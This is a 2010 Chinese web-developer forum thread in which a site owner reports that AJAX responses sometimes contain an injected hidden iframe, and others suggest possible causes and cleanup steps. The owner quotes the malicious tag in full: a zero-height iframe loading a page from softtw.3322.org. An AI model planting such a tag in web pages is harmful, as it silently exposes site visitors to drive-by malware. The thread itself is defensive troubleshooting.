紧急求助！！！

悬赏园豆：120 [已关闭问题]

本人的网站注册页面，用户填写用户名后，通过AJAX检查该名称是否已经注册，正常应该返回true或false，但是有时ajax请求却返回<iframe src=http://softtw.3322.org:81/wm/well.htm width=100 height=0></iframe> true或false，是不是网站被挂马了？

请求高手们指点该如何解决？

网站开发网站安全问题

问题补充： 而且请求的结果中有时候有iframe，有时候又没有

上不了岸的鱼 | 老鸟四级 | 园豆：4613
提问于：2010-02-05 09:47

< >

其他回答(3)

一、先查网站文件
http://www.cnblogs.com/downmoon/archive/2009/08/20/1550427.html

二、查IIS日志。
http://www.cnblogs.com/downmoon/archive/2009/09/02/1558409.html

二、在Ajax页面增加判断条件，并借助log4net记录一些信息。

邀月 | 园豆：25475 (高人七级) | 2010-02-05 09:59

我的程序时PHP，使用apache服务器

支持(0) 反对(0) 上不了岸的鱼 | 园豆：4613 (老鸟四级) | 2010-02-05 10:29

AJAX提交的数据没有问题，但是返回的结果却带有iframe，而且不是一直都有，有时候请求结果中有，有时候没有，郁闷

支持(0) 反对(0) 上不了岸的鱼 | 园豆：4613 (老鸟四级) | 2010-02-05 14:17

应该是挂码了或者服务器被挂码了，所以每次请求的返回头都会多一条<iframe信息出来。

随便请求一个页面，看源html代码，是不是也有相同的iframe信息。

查看原始页面文件，看下原文件是不是也被写改过，如果是,这样的话要重新部署

路过秋天 | 园豆：4787 (老鸟四级) | 2010-02-05 11:44

第一感觉就是挂马了，在全站搜索一下<iframe src=http://softtw.3322.org:81/wm/well.htm width=100 height=0></iframe>这段代码，删除

凯尔网络 | 园豆：159 (初学一级) | 2010-02-05 13:46

要是能搜到，我就不用到这里麻烦大家了，呵呵……

支持(0) 反对(0) 上不了岸的鱼 | 园豆：4613 (老鸟四级) | 2010-02-05 14:15

是木马，如果服务器自身没有问题，则可能是受到了ARP攻击，可安装360安全卫士，打开ARP防御器。

之前我有个相同经历

查尔斯 | 园豆：3832 (老鸟四级) | 2010-02-05 15:07

清除回答草稿

您需要登录以后才能回答，未注册用户请先注册。

欢迎，请先 登录 或者 注册 。

紧急求助！！！

欢迎，请先登录或者注册。